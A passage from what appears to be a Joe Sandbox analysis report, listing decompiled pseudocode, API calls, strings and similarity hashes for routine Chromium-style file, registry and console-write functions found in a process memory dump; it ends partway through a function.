				void* __edi;
				void* __esi;
				signed int _t16;
				void* _t35;
				intOrPtr* _t40;
				intOrPtr _t42;
				signed int _t43;
				void* _t49;

				_t53 = __fp0;
				_t49 = __eflags;
				_t35 = __edx;
				_t27 = __ebx;
				_t40 = __ecx;
				_t16 =  *0xd40014; // 0xfbddd969
				_v16 = _t16 ^ _t43;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x50], xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x30], xmm0");
				asm("movdqa [esp+0x20], xmm0");
				L00CC4C80( &_v108, "GetLength", "..\\..\\base\\files\\file_win.cc", 0xa8);
				L00CC9DD0(__ebx,  &_v92, _t35, _t49, __fp0,  &_v108, 0);
				_v112 = 0xffffffff;
				_v116 = 0;
				if(E00CC4AA0() != 0) {
					L00CC4BB0( &_v108, __fp0, "File::GetLength", _t40, 0, 0);
				}
				_v112 = 0xffffffff;
				_v116 = 0xffffffff;
				__imp__GetFileSizeEx( &_v116);
				asm("sbb esi, esi");
				_t42 = _v124;
				L00CC4B40( &_v116);
				E00CFE643(L00CC9E30( &_v100, _t35, _t53), _t27, _v24 ^ _t43, _t35, _v120, _t42,  *_t40);
				return _t42;
			}

0x00cc09a0
0x00cc09a0
0x00cc09a0
0x00cc09a0
0x00cc09ab
0x00cc09ad
0x00cc09b4
0x00cc09b8
0x00cc09bc
0x00cc09c2
0x00cc09c8
0x00cc09ce
0x00cc09e8
0x00cc09f7
0x00cc09fc
0x00cc0a04
0x00cc0a13
0x00cc0a23
0x00cc0a23
0x00cc0a28
0x00cc0a30
0x00cc0a3f
0x00cc0a4a
0x00cc0a52
0x00cc0a5a
0x00cc0a6e
0x00cc0a7d

APIs

GetFileSizeEx.KERNEL32(?,FFFFFFFF), ref: 00CC0A3F

Strings

GetLength, xrefs: 00CC09E2
..\..\base\files\file_win.cc, xrefs: 00CC09DD
File::GetLength, xrefs: 00CC0A1E

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: FileSize
String ID: ..\..\base\files\file_win.cc$File::GetLength$GetLength
API String ID: 3433856609-1526572189
Opcode ID: e3fd6cfab058cf86b730b025544b5afc4b51e1d0589ecdf7a84ec0e5a6c3d53e
Instruction ID: aef19662b5f7da74542f84392626a32950c29c11b51e2bc489621ab6c30228c4
Opcode Fuzzy Hash: e3fd6cfab058cf86b730b025544b5afc4b51e1d0589ecdf7a84ec0e5a6c3d53e
Instruction Fuzzy Hash: 05216F32514781ABD210DF14CC52F6AF7A4BFD9720F504B1DF5E4662D1DBB09609CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CD1630 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00CD1630(void** __ecx, void* __edx, void* __eflags, void* _a4, short* _a8, int _a12) {
				signed int _v20;
				char _v24;
				void* _v40;
				void** _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				void* _t23;
				int _t25;
				void* _t31;
				void* _t32;
				void* _t33;
				void** _t34;
				signed int _t35;

				_t31 = __edx;
				_v44 = __ecx;
				_t25 = _a12;
				_t32 = _a4;
				_t15 =  *0xd40014; // 0xfbddd969
				_v20 = _t15 ^ _t35;
				_v24 = 0xff;
				_t34 =  &_v40;
				L00CC4C80(_t34, "Open", "..\\..\\base\\win\\registry.cc", 0xc2);
				E00CE5A40( &_v24, _t34, _t32, _t25);
				_v40 = 0;
				_t19 = RegOpenKeyExW(_t32, _a8, 0, _t25, _t34);
				_t33 = _t19;
				if(_t19 == 0) {
					_t34 = _v44;
					_t23 =  *_t34;
					if(_t23 != 0) {
						RegCloseKey(_t23);
					}
					_t19 = _v40;
					 *_t34 = _v40;
					_t34[1] = _t25;
				}
				E00CFE643(E00C90790(_t19), _t25, _v20 ^ _t35, _t31, _t33, _t34);
				return _t33;
			}

0x00cd1630
0x00cd1639
0x00cd163c
0x00cd163f
0x00cd1642
0x00cd1649
0x00cd164c
0x00cd1650
0x00cd1663
0x00cd1671
0x00cd1676
0x00cd1685
0x00cd168b
0x00cd168f
0x00cd1691
0x00cd1694
0x00cd1698
0x00cd169b
0x00cd169b
0x00cd16a1
0x00cd16a4
0x00cd16ac
0x00cd16ac
0x00cd16bc
0x00cd16ca

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,?), ref: 00CD1685
RegCloseKey.ADVAPI32(00000000), ref: 00CD169B

Strings

Open, xrefs: 00CD165D
..\..\base\win\registry.cc, xrefs: 00CD1658

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: CloseOpen
String ID: ..\..\base\win\registry.cc$Open
API String ID: 47109696-830328924
Opcode ID: 33e9ff4c3a8537b07bcfd4e12495a49778179a048f19601483977ef6aef62186
Instruction ID: 32ff1b56d0e5626ef294f544bc8da0f756c6dcd21a6253420ee5f5993f9cd32a
Opcode Fuzzy Hash: 33e9ff4c3a8537b07bcfd4e12495a49778179a048f19601483977ef6aef62186
Instruction Fuzzy Hash: B9118C75A00209ABDB10DFA8DC85AEFBBB8EF48324F140419F911B7281D730AE00CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 00CC0240 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00CC0240(void* __eflags, void* __fp0, WCHAR* _a4) {
				void* _v16;
				signed int _v24;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				signed int _t17;
				signed int _t18;
				void* _t23;
				WCHAR* _t24;
				signed int _t26;
				signed int _t27;
				void* _t32;

				_t36 = __fp0;
				_t32 = __eflags;
				_t24 = _a4;
				_t9 =  *0xd40014; // 0xfbddd969
				_v24 = _t9 ^ _t26;
				asm("pcmpeqd xmm0, xmm0");
				asm("movdqa [esp+0x40], xmm0");
				asm("movdqa [esp+0x30], xmm0");
				asm("movdqa [esp+0x20], xmm0");
				asm("movdqa [esp+0x10], xmm0");
				_t17 = (_t27 & 0xfffffff0) - 0x60;
				L00CC4C80(_t17, "PathExists", "..\\..\\base\\files\\file_util_win.cc", 0x262);
				_t25 =  &_v96;
				L00CC9DD0(_t17,  &_v96, _t23, _t32, __fp0, _t17, 0);
				if(_t24[5] < 0) {
					_t24 =  *_t24;
				}
				_t18 = _t17 & 0xffffff00 | GetFileAttributesW(_t24) != 0xffffffff;
				E00CFE643(L00CC9E30(_t25, _t23, _t36), _t18, _v24 ^ _t26, _t23, _t24, _t25);
				return _t18;
			}

0x00cc0240
0x00cc0240
0x00cc024c
0x00cc024f
0x00cc0256
0x00cc025a
0x00cc025e
0x00cc0264
0x00cc026a
0x00cc0270
0x00cc0276
0x00cc0288
0x00cc0290
0x00cc0299
0x00cc02a2
0x00cc02a4
0x00cc02a4
0x00cc02b0
0x00cc02c0
0x00cc02ce

APIs

GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00CC02A7

Strings

..\..\base\files\file_util_win.cc, xrefs: 00CC027D
PathExists, xrefs: 00CC0282
msedge.exe, xrefs: 00CC0245

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: AttributesFile
String ID: ..\..\base\files\file_util_win.cc$PathExists$msedge.exe
API String ID: 3188754299-3206840752
Opcode ID: 828f0434b767994a1546f88dbcec02abdce4e7d8c80ab7a64b1318a275a713ef
Instruction ID: bf88f2d209d49e1795191603ea51ec5b2c282a8d9a14fa689322ed708fb48e16
Opcode Fuzzy Hash: 828f0434b767994a1546f88dbcec02abdce4e7d8c80ab7a64b1318a275a713ef
Instruction Fuzzy Hash: DB01DD72A1478567D3109B24CC46B6EF768EFD9730F50071EF9D193281EBB0968482D2

Uniqueness

Uniqueness Score: -1.00%

Function 00CC0790 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00CC0790() {

				return GetProcAddress(GetModuleHandleA("kernel32.dll"), "PrefetchVirtualMemory");
			}

0x00cc07ab

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,00CCB388), ref: 00CC0798
GetProcAddress.KERNEL32(00000000,PrefetchVirtualMemory), ref: 00CC07A4

Strings

kernel32.dll, xrefs: 00CC0793
PrefetchVirtualMemory, xrefs: 00CC079E

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: PrefetchVirtualMemory$kernel32.dll
API String ID: 1646373207-4069913949
Opcode ID: e95c16c40ddf5f28686032dcdf7081aecc5e6aafca7f00750ac15ae2163a5665
Instruction ID: 7df24ca106a53805106fed274beb2562274013b361a19caab926171222b8ca44
Opcode Fuzzy Hash: e95c16c40ddf5f28686032dcdf7081aecc5e6aafca7f00750ac15ae2163a5665
Instruction Fuzzy Hash: 13B09272588308BF850027E2EE0F8A57F2C9645A32B000002B24AC1A508FE256448A76

Uniqueness

Uniqueness Score: -1.00%

Function 00D109AB Relevance: 6.3, APIs: 4, Instructions: 338
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00D109AB(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16, intOrPtr _a20) {
				char _v16;
				signed int _v20;
				char _v28;
				char _v35;
				signed char _v36;
				void _v44;
				long _v48;
				signed char* _v52;
				char _v53;
				long _v60;
				intOrPtr _v64;
				struct _OVERLAPPED* _v68;
				signed int _v72;
				struct _OVERLAPPED* _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				void _v92;
				long _v96;
				signed char* _v100;
				void* _v104;
				intOrPtr _v108;
				char _v112;
				int _v116;
				struct _OVERLAPPED* _v120;
				struct _OVERLAPPED* _v124;
				struct _OVERLAPPED* _v128;
				struct _OVERLAPPED* _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				int _t186;
				signed char* _t190;
				signed char _t195;
				intOrPtr _t198;
				void* _t200;
				signed char* _t201;
				long _t205;
				intOrPtr _t210;
				void _t212;
				signed char* _t217;
				void* _t224;
				char _t227;
				struct _OVERLAPPED* _t229;
				void* _t238;
				signed int _t240;
				signed char* _t243;
				long _t246;
				intOrPtr _t247;
				signed char* _t248;
				void* _t258;
				intOrPtr _t265;
				void* _t266;
				struct _OVERLAPPED* _t267;
				signed int _t268;
				signed int _t273;
				intOrPtr* _t279;
				signed int _t281;
				signed int _t285;
				signed char _t286;
				long _t287;
				signed int _t291;
				signed char* _t292;
				struct _OVERLAPPED* _t296;
				void* _t299;
				signed int _t300;
				signed int _t302;
				struct _OVERLAPPED* _t303;
				signed char* _t306;
				intOrPtr* _t307;
				void* _t308;
				signed int _t309;
				long _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				void* _t315;
				void* _t316;

				_push(0xffffffff);
				_push(0xd251b5);
				_push( *[fs:0x0]);
				_t315 = _t314 - 0x74;
				_t177 =  *0xd40014; // 0xfbddd969
				_t178 = _t177 ^ _t313;
				_v20 = _t178;
				_push(_t178);
				 *[fs:0x0] =  &_v16;
				_t180 = _a8;
				_t306 = _a12;
				_t265 = _a20;
				_t268 = (_t180 & 0x0000003f) * 0x38;
				_t291 = _t180 >> 6;
				_v100 = _t306;
				_v64 = _t265;
				_v84 = _t291;
				_v72 = _t268;
				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0xd44820 + _t291 * 4)) + _t268 + 0x18));
				_v88 = _a16 + _t306;
				_t186 = GetConsoleOutputCP();
				_t317 =  *((char*)(_t265 + 0x14));
				_v116 = _t186;
				if( *((char*)(_t265 + 0x14)) == 0) {
					E00D024A0(_t265, _t317);
				}
				_t307 = _a4;
				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t190 = _v100;
				_t292 = _t190;
				_v52 = _t292;
				if(_t190 < _v88) {
					_t300 = _v72;
					_t267 = 0;
					_v76 = 0;
					do {
						_v53 =  *_t292;
						_v68 = _t267;
						_v48 = 1;
						_t273 =  *(0xd44820 + _v84 * 4);
						_v80 = _t273;
						if(_v108 != 0xfde9) {
							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
							__eflags = _t195 & 0x00000004;
							if((_t195 & 0x00000004) == 0) {
								_t273 =  *_t292 & 0x000000ff;
								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
									_push(_v64);
									_push(1);
									_push(_t292);
									goto L29;
								} else {
									_t217 =  &(_t292[1]);
									_v60 = _t217;
									__eflags = _t217 - _v88;
									if(_t217 >= _v88) {
										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
										 *( *(0xd44820 + _v84 * 4) + _t300 + 0x2d) =  *( *(0xd44820 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
									} else {
										_t224 = L00D0DD52(_t273,  &_v68, _t292, 2, _v64);
										_t316 = _t315 + 0x10;
										__eflags = _t224 - 0xffffffff;
										if(_t224 != 0xffffffff) {
											_t201 = _v60;
											goto L31;
										}
									}
								}
							} else {
								_push(_v64);
								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
								_t227 =  *_t292;
								_v35 = _t227;
								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
								_push(2);
								_push( &_v36);
								L29:
								_push( &_v68);
								_t200 = L00D0DD52(_t273);
								_t316 = _t315 + 0x10;
								__eflags = _t200 - 0xffffffff;
								if(_t200 != 0xffffffff) {
									_t201 = _v52;
									goto L31;
								}
							}
						} else {
							_t229 = _t267;
							_t279 = _t273 + 0x2e + _t300;
							while( *_t279 != _t267) {
								_t229 =  &(_t229->Internal);
								_t279 = _t279 + 1;
								if(_t229 < 5) {
									continue;
								}
								break;
							}
							_t302 = _v88 - _t292;
							_v48 = _t229;
							if(_t229 == 0) {
								_t73 = ( *_t292 & 0x000000ff) + 0xd40280; // 0x0
								_t281 =  *_t73 + 1;
								_v80 = _t281;
								__eflags = _t281 - _t302;
								if(_t281 > _t302) {
									__eflags = _t302;
									if(_t302 <= 0) {
										goto L44;
									} else {
										_t309 = _v72;
										do {
											 *((char*)( *(0xd44820 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
											_t267 =  &(_t267->Internal);
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										goto L43;
									}
									L52:
								} else {
									_v132 = _t267;
									__eflags = _t281 - 4;
									_v128 = _t267;
									_v60 = _t292;
									_v48 = (_t281 == 4) + 1;
									_t238 = E00D1111E( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
									_t316 = _t315 + 0x14;
									__eflags = _t238 - 0xffffffff;
									if(_t238 != 0xffffffff) {
										_t240 =  &(_v52[_v80]);
										__eflags = _t240;
										_t300 = _v72;
										goto L21;
									}
								}
							} else {
								_t285 = _v72;
								_t243 = _v80 + 0x2e + _t285;
								_v80 = _t243;
								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0xd40280)) + 1;
								_v60 = _t246;
								_t247 = _t246 - _v48;
								_v76 = _t247;
								if(_t247 > _t302) {
									__eflags = _t302;
									if(_t302 > 0) {
										_t248 = _v52;
										_t310 = _v48;
										do {
											_t286 =  *((intOrPtr*)(_t267 + _t248));
											_t292 =  *(0xd44820 + _v84 * 4) + _t285 + _t267;
											_t267 =  &(_t267->Internal);
											_t292[_t310 + 0x2e] = _t286;
											_t285 = _v72;
											__eflags = _t267 - _t302;
										} while (_t267 < _t302);
										L43:
										_t307 = _a4;
									}
									L44:
									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
								} else {
									_t287 = _v48;
									_t303 = _t267;
									_t311 = _v80;
									do {
										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
										_t303 =  &(_t303->Internal);
										_t311 = _t311 + 1;
									} while (_t303 < _t287);
									_t304 = _v76;
									if(_v76 > 0) {
										L00D00C20( &_v28 + _t287, _t292, _t304);
										_t287 = _v48;
										_t315 = _t315 + 0xc;
									}
									_t300 = _v72;
									_t296 = _t267;
									_t312 = _v84;
									do {
										 *( *((intOrPtr*)(0xd44820 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
										_t296 =  &(_t296->Internal);
									} while (_t296 < _t287);
									_t307 = _a4;
									_v112 =  &_v28;
									_v124 = _t267;
									_v120 = _t267;
									_v48 = (_v60 == 4) + 1;
									_t258 = E00D1111E( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
									_t316 = _t315 + 0x14;
									if(_t258 != 0xffffffff) {
										_t240 =  &(_v52[_v76]);
										L21:
										_t201 = _t240 - 1;
										L31:
										_v52 = _t201 + 1;
										_t205 = L00D1BFBA(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
										_t315 = _t316 + 0x20;
										_v60 = _t205;
										if(_t205 != 0) {
											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
												L50:
												 *_t307 = GetLastError();
											} else {
												_t292 = _v52;
												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
												_v76 = _t210;
												 *((intOrPtr*)(_t307 + 4)) = _t210;
												if(_v96 >= _v60) {
													if(_v53 != 0xa) {
														goto L38;
													} else {
														_t212 = 0xd;
														_v92 = _t212;
														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
															goto L50;
														} else {
															if(_v96 >= 1) {
																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
																_t292 = _v52;
																_v76 =  *((intOrPtr*)(_t307 + 4));
																goto L38;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L51;
						L38:
					} while (_t292 < _v88);
				}
				L51:
				 *[fs:0x0] = _v16;
				_pop(_t299);
				_pop(_t308);
				_pop(_t266);
				return E00CFE643(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
				goto L52;
			}

0x00d109b0
0x00d109b2
0x00d109bd
0x00d109be
0x00d109c1
0x00d109c6
0x00d109c8
0x00d109ce
0x00d109d2
0x00d109d8
0x00d109dd
0x00d109e3
0x00d109e6
0x00d109e9
0x00d109ec
0x00d109ef
0x00d109f2
0x00d109fc
0x00d10a03
0x00d10a0b
0x00d10a0e
0x00d10a14
0x00d10a18
0x00d10a1b
0x00d10a1f
0x00d10a1f
0x00d10a27
0x00d10a2f
0x00d10a34
0x00d10a35
0x00d10a36
0x00d10a37
0x00d10a3a
0x00d10a3c
0x00d10a42
0x00d10a48
0x00d10a4b
0x00d10a4d
0x00d10a50
0x00d10a59
0x00d10a5f
0x00d10a62
0x00d10a69
0x00d10a70
0x00d10a73
0x00d10bad
0x00d10bb1
0x00d10bb4
0x00d10bd7
0x00d10bdd
0x00d10bdf
0x00d10be3
0x00d10c14
0x00d10c17
0x00d10c19
0x00000000
0x00d10be5
0x00d10be5
0x00d10be8
0x00d10beb
0x00d10bee
0x00d10d38
0x00d10d46
0x00d10d4f
0x00d10bf4
0x00d10bfe
0x00d10c03
0x00d10c06
0x00d10c09
0x00d10c0f
0x00000000
0x00d10c0f
0x00d10c09
0x00d10bee
0x00d10bb6
0x00d10bbd
0x00d10bc0
0x00d10bc3
0x00d10bc5
0x00d10bc8
0x00d10bcf
0x00d10bd1
0x00d10c1a
0x00d10c1d
0x00d10c1e
0x00d10c23
0x00d10c26
0x00d10c29
0x00d10c2f
0x00000000
0x00d10c2f
0x00d10c29
0x00d10a79
0x00d10a7c
0x00d10a7e
0x00d10a80
0x00d10a84
0x00d10a85
0x00d10a89
0x00000000
0x00000000
0x00000000
0x00d10a89
0x00d10a8e
0x00d10a90
0x00d10a95
0x00d10b55
0x00d10b5c
0x00d10b5d
0x00d10b60
0x00d10b62
0x00d10d12
0x00d10d14
0x00000000
0x00d10d16
0x00d10d16
0x00d10d19
0x00d10d28
0x00d10d2c
0x00d10d2d
0x00d10d2d
0x00000000
0x00d10d31
0x00000000
0x00d10b68
0x00d10b6d
0x00d10b70
0x00d10b73
0x00d10b79
0x00d10b82
0x00d10b8d
0x00d10b92
0x00d10b95
0x00d10b98
0x00d10ba1
0x00d10ba1
0x00d10ba4
0x00000000
0x00d10ba4
0x00d10b98
0x00d10a9b
0x00d10a9e
0x00d10aa4
0x00d10aa6
0x00d10ab3
0x00d10ab4
0x00d10ab7
0x00d10aba
0x00d10abf
0x00d10ce3
0x00d10ce5
0x00d10ce7
0x00d10cea
0x00d10ced
0x00d10cf9
0x00d10cfc
0x00d10cfe
0x00d10cff
0x00d10d03
0x00d10d06
0x00d10d06
0x00d10d0a
0x00d10d0a
0x00d10d0a
0x00d10d0d
0x00d10d0d
0x00d10ac5
0x00d10ac5
0x00d10ac8
0x00d10aca
0x00d10acd
0x00d10acf
0x00d10ad3
0x00d10ad4
0x00d10ad5
0x00d10ad9
0x00d10ade
0x00d10ae8
0x00d10aed
0x00d10af0
0x00d10af0
0x00d10af3
0x00d10af6
0x00d10af8
0x00d10afb
0x00d10b04
0x00d10b08
0x00d10b09
0x00d10b10
0x00d10b16
0x00d10b1e
0x00d10b29
0x00d10b2e
0x00d10b39
0x00d10b3e
0x00d10b44
0x00d10b4d
0x00d10ba7
0x00d10ba7
0x00d10c32
0x00d10c37
0x00d10c49
0x00d10c4e
0x00d10c51
0x00d10c56
0x00d10c71
0x00d10d54
0x00d10d5a
0x00d10c77
0x00d10c77
0x00d10c82
0x00d10c84
0x00d10c87
0x00d10c90
0x00d10c9a
0x00000000
0x00d10c9c
0x00d10c9e
0x00d10ca0
0x00d10cb9
0x00000000
0x00d10cbf
0x00d10cc3
0x00d10cc9
0x00d10ccc
0x00d10cd2
0x00d10cd5
0x00000000
0x00d10cd5
0x00d10cc3
0x00d10cb9
0x00d10c9a
0x00d10c90
0x00d10c71
0x00d10c56
0x00d10b44
0x00d10abf
0x00d10a95
0x00000000
0x00d10cd8
0x00d10cd8
0x00d10ce1
0x00d10d5c
0x00d10d61
0x00d10d69
0x00d10d6a
0x00d10d6b
0x00d10d77
0x00000000

APIs

GetConsoleOutputCP.KERNEL32(FBDDD969,?,00000000,?), ref: 00D10A0E

Part of subcall function 00D1BFBA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00D15525,?,00000000,-00000008), ref: 00D1C066

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D10C69
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D10CB1
GetLastError.KERNEL32 ref: 00D10D54

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: c1da9046f073b75f730c341ef8178cb303448a713cd50eecb5e946b044520a74
Instruction ID: 7613ead1b13658d9c64ead7b42fa3a9498e1f8b2bdbc93ac643a7caa3fb55417
Opcode Fuzzy Hash: c1da9046f073b75f730c341ef8178cb303448a713cd50eecb5e946b044520a74
Instruction Fuzzy Hash: C1D159B5D00258AFCB15DFE8E880AEDBBB5FF09314F18412AE955E7351DB70A981CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CCD9C0 Relevance: 6.3, APIs: 4, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00CCD9C0(void* __ecx, signed int __edx, void* __fp0, signed int _a4, signed char* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a28) {
				signed int _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t78;
				intOrPtr _t82;
				signed int _t85;
				signed int _t87;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t100;
				signed int _t102;
				signed int _t104;
				intOrPtr* _t109;
				void* _t113;
				void* _t114;
				signed int _t115;
				signed int _t122;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t125;
				signed int _t139;
				signed int _t140;
				signed int _t144;
				signed int _t150;
				signed char* _t156;
				signed int _t157;
				unsigned int _t160;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				void* _t166;

				_t173 = __fp0;
				_t147 = __edx;
				_t155 = _a24;
				_t156 = _a8;
				_t74 =  *0xd40014; // 0xfbddd969
